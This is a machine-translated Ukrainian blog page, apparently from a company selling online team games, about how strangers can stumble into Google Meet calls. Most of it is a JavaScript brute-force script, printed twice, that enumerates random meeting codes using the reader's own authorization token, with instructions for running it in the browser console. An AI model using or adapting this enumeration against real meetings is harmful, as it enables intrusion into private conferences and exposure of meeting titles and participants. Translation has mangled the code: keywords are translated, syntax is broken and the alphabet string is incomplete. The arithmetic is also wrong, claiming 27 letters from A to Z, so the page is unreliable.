Visio – застрягти в Google Meet | Дірк, Діна зустрічається – Visio
Зустріньте Вісіо
randomize = () => dico = dico.Розкол (”).Карта (значення => (< value, sort: Math.random() >)).заклинання ((a, b) => a.заклинання – б.заклинання).Карта ((< value >) => значення).Приєднатися (”),
Newpatternkey = () => “xxx-xxxx-xxx”.Розкол (”).Карта (c => c == ‘-‘?С: Рядок.від Charcode (математика.Підлога (математика.Random ()*25) +97)).Приєднатися (”),
Ключ = newpatternkey (), лічильник = 20;
Next = () => ключ.Розкол (”).Карта (e => e == ‘-‘ ? Е: Діко [Діко.Indexof (e) + 1> = dico.довжина ? 0: Діко.Indexof (e) + 1]).Приєднатися (”),
Лічильник = 0;
MeetLink = ‘https: // зустрітися.Google.com/’, доступний Toe = () => xhr = новий xmlhttprequest ();
Якщо (лічильник ++> = 20) лічильник = 0;
Key = newpatternkey ();
Рандомізувати ();
>
Ключ = наступний ();
xhr.Відкрити (‘Get’, MeetLink + ключ);
xhr.AddeVentLisner (‘навантаження’, (e) => fetch (MeetLink.concat (“/$ rpc/google.RTC.зустрічі.V1.MeetingsPaceservice/Resolewemeetingspace “),” заголовки “:” авторизація “: авторизація,
“Тип вмісту”: “Додаток/X-Protobuf”,
“X-goog-adep-ключ”: e.цільовий.відповідальність.Збіг (/\ [“https \: \/\/meet \.Google \.com \ “\,” ([A-ZA-Z0-9 \ _ \-]) “\]/) [1],
“X-goog-authuse”: “0”,
“X-goog-endode-réspose-if-secutable”: “base64”,
“X-goog-meeting-ідентифікатор”: btoa (‘\ b \ x02 \ x12 \ f’.Concat (ключ)),
>,
“Тіло”: “\ n \ f”.Concat (ключ, “0 \ U0001”),
“Метод”: “Пост”
>).Тоді (e => e.Text ())
.тоді (e => setTimeout (доступний, 100);
консоль.Журнал (MeetLink.Concat (ключ).BeautifyDisplay (38), (e.Замінити (/[^a-Za-Z0-9]/g, “”)+””).BeautifyDisplay (38));
>);
>);
xhr.Sent ();
>;
Нитка.прототип.BeautifyDisplay = функція (розмір) < let txt = this.valueOf(); return txt.concat(' '.repeat(txt.length >розмір ? TXT.Довжина: розмір)).Substr (0, розмір).Concat (‘|’); >,
консоль.Clear ();
Доступно ();
>) ()
Дрочити
В даний час працюючи в галузі кібербезпеки, я регулярно стикаюся з досить тривіальними ситуаціями.
Останнє, вторгнення людини під час зустрічі .
На щастя, для безпеки Google Meet включала функцію, що дозволяє попередити учасників, що людина прагне приєднатися до відеоконференції, а й прийняти або відмовити.
Однак ця подія змушує мене задати собі ряд питань .
Складність посилання Google Meet
Перш за все, як людина може підключитися до зустрічі, не запрошуючи на нього ?
Ми повинні розглянути простоту посилання: https: // google.зустрічатися.com/Xxx -yyy -zzzz
Xxx -yyy -zzzz є лише алфавітними символами між A і Z, тобто 27 можливі комбінації для кожного персонажа.
Для математиків, отже, є:
27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 Можливі комбінації .
Тривалість життя Google Meet Link
Хоча зараз ми можемо краще зрозуміти, як побудовані посилання наших облігацій на конференції “Google Meet”, є дуже важливий аспект, який слід врахувати . Життя посилання на зустріч Google !
Дійсно, кожен може генерувати зустрічі Google зустрічей за кілька кліків.
Але через кілька днів, тижнів або місяців . Посилання вже не дійсні.
Отже, генеровані посилання мають певний період дійсності .
Виняток Зробіть “повторювані” події, і саме тут стає цікавим.
У бізнесі є багато можливостей регулярно організовувати (команда / бізнес, щоденний, щотижня, щомісяця,, . )).
Коли працівник генерує цей тип події у своєму порядку денному, автоматично генерується посилання на зустріч Google. Цей незмінний.
Тож у вас буде однакове посилання кожного разу для цієї події.
З невеликою JavaScript та грубим силою ?
З усіма цими елементами ми зараз готові підмітати всі можливості та досягти великих ймовірностей для виявлення посилань на відеоконовії !
Тож у мене є невелика ретро-застрахована робота Google Meet, щоб написати код JavaScript, який спробує нескінченну кількість комбінацій
(C) Дірк.Org 2023-2024 – Рулетка Meet’s Meet
(1) Запустіть цей сценарій на https: // google.зустрічатися.com
(2
Нехай авторизація = “Sapisidhash xxxxxxxxxxxxxxxx_xxxxxxxxxxxxxxxxxxxxxxxxxxxxx“, dico =” abcdefghijklmnopqrstuvxz “,
randomize = () => dico = dico.Розкол (”).Карта (значення => (< value, sort: Math.random() >)).заклинання ((a, b) => a.заклинання – б.заклинання).Карта ((< value >) => значення).Приєднатися (”),
Newpatternkey = () => “xxx-xxxx-xxx”.Розкол (”).Карта (c => c == ‘-‘?С: Рядок.від Charcode (математика.Підлога (математика.Random ()*25) +97)).Приєднатися (”),
Ключ = newpatternkey (), лічильник = 20;
Next = () => ключ.Розкол (”).Карта (e => e == ‘-‘ ? Е: Діко [Діко.Indexof (e) + 1> = dico.довжина ? 0: Діко.Indexof (e) + 1]).Приєднатися (”),
Лічильник = 0;
MeetLink = ‘https: // зустрітися.Google.com/’, доступний Toe = () => xhr = новий xmlhttprequest ();
Якщо (лічильник ++> = 20) лічильник = 0;
Key = newpatternkey ();
Рандомізувати ();
>
Ключ = наступний ();
xhr.Відкрити (‘Get’, MeetLink + ключ);
xhr.AddeVentLisner (‘навантаження’, (e) => fetch (MeetLink.concat (“/$ rpc/google.RTC.зустрічі.V1.MeetingsPaceservice/Resolewemeetingspace “),” заголовки “:” авторизація “: авторизація,
“Тип вмісту”: “Додаток/X-Protobuf”,
“X-goog-adep-ключ”: e.цільовий.відповідальність.Збіг (/\ [“https \: \/\/meet \.Google \.com \ “\,” ([A-ZA-Z0-9 \ _ \-]) “\]/) [1],
“X-goog-authuse”: “0”,
“X-goog-endode-réspose-if-secutable”: “base64”,
“X-goog-meeting-ідентифікатор”: btoa (‘\ b \ x02 \ x12 \ f’.Concat (ключ)),
>,
“Тіло”: “\ n \ f”.Concat (ключ, “0 \ U0001”),
“Метод”: “Пост”
>).Тоді (e => e.Text ())
.Тоді (e =>
SetTimeout (доступний, 100);
консоль.Журнал (MeetLink.Concat (ключ).BeautifyDisplay (38), (e.Замінити (/[^a-Za-Z0-9]/g, “”)+””).BeautifyDisplay (38));
>);
>);
xhr.Sent ();
>;
Нитка.прототип.BeautifyDisplay = функція (розмір) < let txt = this.valueOf(); return txt.concat(' '.repeat(txt.length >розмір ? TXT.Довжина: розмір)).Substr (0, розмір).Concat (‘|’); >,
консоль.Clear ();
Доступно ();
>) ()
Для роботи все це буде потрібно:
- Відкрийте сторінку https: // зустрітися.Google.com
- Відкрийте консоль розробника
- На вкладці “Мережа” фільтруйте Fetch / XHR та відновіть маркер маркера“Авторизація”
- Скопіюйте та вставте вихідний код вище та поставте на місце вказане маркер.
- Перевірте клавішу “Вхід” на клавіатурі.
Відновлення маркера “авторизації”:
Для цікавого, це те, як повинен виглядати результат цього сценарію в дії.
Тому ми зазначаємо рядки, які інформують нам про те, що простір для відеоконференції не існує.
Та інші, які поставили нас на знак конференції ! Тому вказівка на те, що посилання є дійсним;)
Однак не сподівайтеся, що через кілька секунд впаде на посилання на зустріч ^^
(Якщо ви трохи пощастило)
Вам потрібно буде бути чудовим терпіння, дозволяючи йому бігати не менше півгодини.
Висновок
Не панікуйте, що існує більша кількість удачі, щоб знайти дійсне посилання на зустріч Google, ніж виграш Loto.
Увага ! Людина, яка натрапляє на дійсну зустріч доступу до посилання на певну інформацію без необхідності підключення:
Назва зустрічі (тому уникайте ковзання конфіденційної інформації) та підключених учасників (усі або гра).
Зустріньте Вісіо
Інтернет -пограбування
Одночасно до 1000 гравців
Проста платформа для доступу, у Visio
Горизонт 2024
Одночасно до 1000 гравців
Проста платформа для доступу, у Visio
Де Чарлі ?!
Одночасно до 1000 гравців
Проста платформа для доступу, у Visio
Місія Enigma
Одночасно до 1000 гравців
Проста платформа для доступу, у Visio
Поінформованість кібербезпеки
Одночасно до 5000 гравців
Проста платформа для доступу, у Visio
Збережіть Різдво !
Одночасно до 1000 гравців
Проста платформа для доступу, у Visio
Copyright © 2023 – Dyna’meet
Керуйте згодою на печиво
Щоб запропонувати найкращий досвід, ми використовуємо такі технології, як файли cookie для зберігання та/або доступ до інформації пристроїв. Згода на ці технології дозволить нам обробляти такі дані, як навігаційна поведінка або унікальні ідентифікатори на цьому сайті. Факт не згоди або зняття згоди може негативно вплинути на певні характеристики та функції.
Функціональний функціональний завжди активований
Зберігання або технічний доступ суворо необхідний в кінці законного інтересу, що дозволяє використовувати конкретну послугу, яку явно вимагає абонент або користувач, або з єдиною метою передачі передачі зв’язку в електронній комунікаційній мережі.
Уподобання переваги
Зберігання або технічний доступ необхідний з метою законного інтересу для зберігання переваг, які не вимагають абонента або особа, яка використовує послугу.
Статистична статистика
Зберігання або технічний доступ, який використовується виключно для статистичних цілей. Зберігання або технічний доступ, який використовується виключно в анонімних статистичних цілях. За відсутності появи повістки, добровільне дотримання з боку вашого постачальника доступу до Інтернету або додаткових записів від третьої сторони, інформація, що зберігається або витягнута в цьому кінці, як правило, не може бути використана для ідентифікації.
Зберігання або технічний доступ необхідний для створення профілів користувачів для надсилання реклами або слідкуйте за користувачем на веб -сайті або на декількох веб -сайтах з подібними маркетинговими цілями.